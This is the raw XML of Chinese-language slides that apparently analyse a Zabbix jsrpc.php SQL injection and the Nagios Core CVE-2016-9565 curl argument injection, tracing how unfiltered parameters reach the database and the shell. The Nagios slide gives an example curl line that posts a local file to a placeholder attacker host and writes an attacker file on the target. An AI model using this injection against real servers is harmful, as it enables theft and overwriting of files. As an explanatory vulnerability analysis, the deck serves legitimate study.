            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>insertDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数向数据库中插入数据时未对参数进行有效过滤</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2084125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73B9A3D-0FFB-4511-80E6-EBE7BACF55BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{7D109FED-0AB2-4593-BF7A-BB0CA41CA2F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>首先对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>jsrpc.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>文件进行分析追踪。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>$data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>参数中存储了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>请求参数，将其传入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>CScreenBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>getScreen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>后，我们跟入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>getScreen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>函数，可以看到如下代码：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{6E29EC9F-2956-48D7-8C4D-FDA970484E27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6640183" y="219607"/>
            <a:ext cx="3047143" cy="3249426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{7E043FAB-AA50-413D-8BF5-522ADB4590F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6640183" y="3787878"/>
            <a:ext cx="4327525" cy="2850515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32480871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C77A28F-5FA7-4A8A-BF38-B8C57A5F8243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Nagios core</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cve-2016-9565</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{65722CFB-1EEE-4B11-96D7-D8BD65B0DC28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1828800"/>
            <a:ext cx="9905999" cy="4770783"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>漏洞触发点在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>nagios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/share/includes/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>extlib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/Snoopy.class.inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>httpsrequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>函数中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>.(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>主页加载的时候会使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>fetch_rss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>httpsrequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其中使用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>escapeshellcmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数旨在对传入的字符串进行转义，但是并没有防止注入多个参数，所以可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的参数读取和写入本地文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Eg:Curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> (‘https://Attacker_IP -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Fpasswd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>localfilename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -o filename </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>attacker_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’, permanent=False)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以读取本地文件并写入文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{562D4952-4331-4EFC-84CC-5D00C0665B59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141411" y="2973995"/>
            <a:ext cx="9782175" cy="666750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37437925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6A26EAD-0B63-48F3-82FF-1F7C1D91CDC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{455D5FA8-208D-420D-9797-CC6B47D9E048}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141410" y="2249486"/>
            <a:ext cx="4878389" cy="4177818"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>根据传入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>resourcetype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>不同会实例化不同的类，而这些类的基类均为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>CScreenBase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>类。我们跟踪到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>CScreenBase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>类的构造函数中可以看到下面的代码：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>可以看到，在构造函数中将传入的参数带入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>calculateTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>函数，在该函数中再调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>CProfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>::update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>并传入用户可控的参数。接下来再进入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>CProfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>::update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，有如下代码：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{EEFC45EC-3F71-40BA-B370-8373D63DC9A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6094412" y="2249486"/>
            <a:ext cx="4875213" cy="1537525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{4D0A3054-1B60-40A7-BF45-90B13C6A85A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172203" y="3919113"/>
            <a:ext cx="4506595" cy="2711450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6136123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E8B39AA-3FB6-4870-9090-1DF2823E8FE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2DA91063-80CF-4059-937F-575197AC88B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>右侧</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的代码中，将用户传入的参数赋值给了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>self::$insert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，而在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>jsrpc.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>文件最后会包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>page_footer.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>在该文件中会执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>CProfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>::flush()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>如下所示：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{7BFC63E7-DE30-412C-899A-A95DB20FC8F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019799" y="779787"/>
            <a:ext cx="4875213" cy="2336160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{C7C13DE5-5247-4F2D-94C4-A49701B918D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019799" y="3420744"/>
            <a:ext cx="4479925" cy="321310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A65C2BE-0FEA-4615-8E9E-9BD7A79F4393}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019799" y="4020343"/>
            <a:ext cx="3832229" cy="940367"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37315255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D9179B4-49CB-4688-8D0C-4C951A92A685}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2DB3A188-AC08-4A44-A4D9-46B9EF509B28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>继续查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>CProfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>::flush()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>在该函数中可以看到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>self::$insert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>中的数据被传入了</a:t>
            </a:r>
